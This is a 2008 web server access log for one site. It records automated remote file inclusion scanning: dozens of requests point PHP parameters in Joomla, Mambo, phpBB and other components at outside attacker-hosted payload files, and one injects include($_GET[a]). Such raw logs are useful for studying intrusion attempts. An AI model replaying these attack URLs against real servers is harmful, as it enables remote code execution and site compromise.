87.233.3.132 - - [06/May/2008:11:01:02 -0700] "GET /index.php?body=http://n3bunel.ath.cx/safe.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.61.4 - - [06/May/2008:11:01:07 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.47rclan.com/ultrastats/include/%20%20%20/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [06/May/2008:11:01:07 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.47rclan.com/ultrastats/include/%20%20%20/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [06/May/2008:11:01:07 -0700] "GET /logs/access_080220.log//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.47rclan.com/ultrastats/include/%20%20%20/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [06/May/2008:11:01:07 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.47rclan.com/ultrastats/include/%20%20%20/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
142.150.1.9 - - [06/May/2008:11:01:20 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:11:01:21 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://castel.ueuo.com/new.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.23.125 - - [06/May/2008:11:01:22 -0700] "GET /logs/access_080302.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.128.80.102 - - [06/May/2008:11:01:23 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.102 - - [06/May/2008:11:01:24 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:11:02:39 -0700] "GET /Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.geocities.com/fitra.yulia/indah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
142.150.1.9 - - [06/May/2008:11:02:48 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.88.4.5 - - [06/May/2008:11:02:53 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.villadolores.gov.ar/portal//images/data/shep?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.250.148.44 - - [06/May/2008:11:03:04 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.250.148.44 - - [06/May/2008:11:03:05 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.250.148.44 - - [06/May/2008:11:03:06 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
196.35.158.181 - - [06/May/2008:11:03:46 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.113.24.154 - - [06/May/2008:11:03:55 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [06/May/2008:11:03:56 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
206.221.191.24 - - [06/May/2008:11:03:59 -0700] "GET /logs/access_080218.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.46.234 - - [06/May/2008:11:04:03 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.38.46.234 - - [06/May/2008:11:04:03 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
142.150.1.9 - - [06/May/2008:11:04:10 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.116.174.9 - - [06/May/2008:11:04:15 -0700] "GET /logs/access_080201.log//modules/My_eGallery/public/displayCategory.php?basepath=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
203.250.148.44 - - [06/May/2008:11:04:32 -0700] "GET /logs/access_080321.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.58.138.166 - - [06/May/2008:11:04:58 -0700] "GET /logs/access_080309.log/faqsupport/include.php?path[docroot]=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.102 - - [06/May/2008:11:05:05 -0700] "GET /logs/access_080120.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.246.61.4 - - [06/May/2008:11:05:10 -0700] "GET /myevent.php?myevent_path=http://www.47rclan.com/ultrastats/include/%20%20%20/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [06/May/2008:11:05:10 -0700] "GET /logs/myevent.php?myevent_path=http://www.47rclan.com/ultrastats/include/%20%20%20/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [06/May/2008:11:05:10 -0700] "GET /logs/access_080120.log/myevent.php?myevent_path=http://www.47rclan.com/ultrastats/include/%20%20%20/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [06/May/2008:11:05:11 -0700] "GET /logs/access_080121.log/myevent.php?myevent_path=http://www.47rclan.com/ultrastats/include/%20%20%20/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:11:05:23 -0700] "GET /logs//mygallerybrowser.php?myPath=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:11:05:23 -0700] "GET //mygallerybrowser.php?myPath=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
206.221.191.24 - - [06/May/2008:11:05:30 -0700] "GET /logs/access_080225.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
206.221.191.24 - - [06/May/2008:11:05:30 -0700] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
206.221.191.24 - - [06/May/2008:11:05:30 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.240.12.1 - - [06/May/2008:11:05:45 -0700] "GET /logs//index2.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.tecnomusic.com.mx/v1/cache/mambo.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
62.240.12.1 - - [06/May/2008:11:05:45 -0700] "GET //index2.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.tecnomusic.com.mx/v1/cache/mambo.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
76.76.13.95 - - [06/May/2008:11:05:52 -0700] "GET /logs/faqsupport/include.php?path[docroot]=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
76.76.13.95 - - [06/May/2008:11:05:52 -0700] "GET /faqsupport/include.php?path[docroot]=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
206.221.191.24 - - [06/May/2008:11:06:00 -0700] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.23.154.168 - - [06/May/2008:11:06:09 -0700] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://ies-ruiz-de-alda.educarm.net//download/Osirys-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.154.168 - - [06/May/2008:11:06:09 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://ies-ruiz-de-alda.educarm.net//download/Osirys-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.154.168 - - [06/May/2008:11:06:09 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://ies-ruiz-de-alda.educarm.net//download/Osirys-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.221.191.24 - - [06/May/2008:11:06:12 -0700] "GET /logs/access_080126.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:11:06:17 -0700] "GET /logs//index.php?option=com_mtree&Itemid=&mosConfig_absolute_path=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:11:06:21 -0700] "GET //index.php?option=com_mtree&Itemid=&mosConfig_absolute_path=http://www.i-promo.info/test.txt? HTTP/1.1" 200 11606 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
206.221.191.24 - - [06/May/2008:11:06:44 -0700] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.111.176.28 - - [06/May/2008:11:07:33 -0700] "GET /logs/access_080213.log//modules/TotalCalendar/about.php?inc_dir=http://www.2knowit.net/modules/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.28 - - [06/May/2008:11:07:34 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.2knowit.net/modules/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.28 - - [06/May/2008:11:07:34 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.2knowit.net/modules/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.221.191.24 - - [06/May/2008:11:08:03 -0700] "GET /logs/access_080108.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
206.221.191.24 - - [06/May/2008:11:08:03 -0700] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
206.221.191.24 - - [06/May/2008:11:08:03 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.111.176.28 - - [06/May/2008:11:08:05 -0700] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://www.2knowit.net/modules/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.232.211.138 - - [06/May/2008:11:08:24 -0700] "GET /logs/access_080302.log//components/com_simpleboard/file_upload.php?sbp=http://201.6.243.67/UP/xs.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.232.211.138 - - [06/May/2008:11:08:24 -0700] "GET //components/com_simpleboard/file_upload.php?sbp=http://201.6.243.67/UP/xs.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.232.211.138 - - [06/May/2008:11:08:24 -0700] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://201.6.243.67/UP/xs.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
203.250.148.44 - - [06/May/2008:11:08:27 -0700] "GET /logs/access_080218.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.251.177.175 - - [06/May/2008:11:08:29 -0700] "GET /logs/access_080218.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
206.221.191.24 - - [06/May/2008:11:08:32 -0700] "GET /logs/access_071227.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.195.37.158 - - [06/May/2008:11:08:37 -0700] "GET /logs/access.log HTTP/1.0" 200 239310 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.90.111.159 - - [06/May/2008:11:09:13 -0700] "GET /logs/access_080215.log/index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
66.90.111.159 - - [06/May/2008:11:09:15 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 200 50 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
66.90.111.159 - - [06/May/2008:11:09:15 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
66.90.111.159 - - [06/May/2008:11:09:22 -0700] "GET /logs/access_080215.log/index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
66.90.111.159 - - [06/May/2008:11:09:22 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 200 50 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
66.90.111.159 - - [06/May/2008:11:09:23 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
85.214.26.250 - - [06/May/2008:11:09:30 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
65.98.95.186 - - [06/May/2008:11:09:34 -0700] "GET /logs/access_071225.log//include/inc_ext/spaw/dialogs/table.php?spaw_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.107.66.224 - - [06/May/2008:11:09:39 -0700] "GET /logs/access.log//index.php?body=http://cocclan.com/SS/osyrisid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.26.250 - - [06/May/2008:11:09:42 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
89.107.66.224 - - [06/May/2008:11:09:43 -0700] "GET /logs//index.php?body=http://cocclan.com/SS/osyrisid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.111.4.18 - - [06/May/2008:11:09:45 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.107.66.224 - - [06/May/2008:11:09:45 -0700] "GET //index.php?body=http://cocclan.com/SS/osyrisid.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
89.3.137.200 - - [06/May/2008:11:09:45 -0700] "GET /logs/access_080201.loghttp://scienceproject.eclub.lv/homework? HTTP/1.0" 404 275 "-" "Googlebot/2.0 (http://www.googlebot.com/bot.html)" "www.dmulk.com"
212.113.24.154 - - [06/May/2008:11:09:47 -0700] "GET /logs/access_080120.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
201.130.79.49 - - [06/May/2008:11:09:49 -0700] "GET /logs/access_080311.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://turque.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.49 - - [06/May/2008:11:09:50 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://turque.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.49 - - [06/May/2008:11:09:50 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://turque.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.193.215.56 - - [06/May/2008:11:10:07 -0700] "GET /logs/access_071209.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/fitra.yulia/mulus.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.215.56 - - [06/May/2008:11:10:08 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/fitra.yulia/mulus.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.215.56 - - [06/May/2008:11:10:09 -0700] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/fitra.yulia/mulus.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.90.111.159 - - [06/May/2008:11:10:11 -0700] "GET /logs/access.log/index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
89.107.66.224 - - [06/May/2008:11:10:17 -0700] "GET /logs/access_080223.log//index.php?body=http://cocclan.com/SS/osyrisid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.63.9.163 - - [06/May/2008:11:10:19 -0700] "GET /logs/access_080201.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.arai.web.id/bleh/bot_site.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
66.90.111.159 - - [06/May/2008:11:10:20 -0700] "GET /logs/access_080215.log/index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
66.90.111.159 - - [06/May/2008:11:10:20 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 200 50 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
66.90.111.159 - - [06/May/2008:11:10:21 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
66.90.111.159 - - [06/May/2008:11:10:22 -0700] "GET /logs/access.log/index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
208.116.0.130 - - [06/May/2008:11:10:38 -0700] "GET /logs//main.php?sayfa=http://www.freephotostation.com//photos/15/a2id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.116.0.130 - - [06/May/2008:11:10:38 -0700] "GET //main.php?sayfa=http://www.freephotostation.com//photos/15/a2id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.118.85.129 - - [06/May/2008:11:10:43 -0700] "GET /logs/access_080311.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://turque.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.118.85.129 - - [06/May/2008:11:10:43 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://turque.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.118.85.129 - - [06/May/2008:11:10:43 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://turque.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.90.111.159 - - [06/May/2008:11:10:45 -0700] "GET /logs/access.log/index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
196.35.158.180 - - [06/May/2008:11:10:49 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
190.173.189.136 - - [06/May/2008:11:10:51 -0700] "GET /logs/access.loghttp://scienceproject.eclub.lv/homework? HTTP/1.0" 404 275 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600" "www.dmulk.com"
196.35.158.180 - - [06/May/2008:11:10:54 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
196.35.158.180 - - [06/May/2008:11:10:59 -0700] "GET /logs/access_071219.log//admin/spaw/spaw_control.class.php?spaw_root=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:11:11:12 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
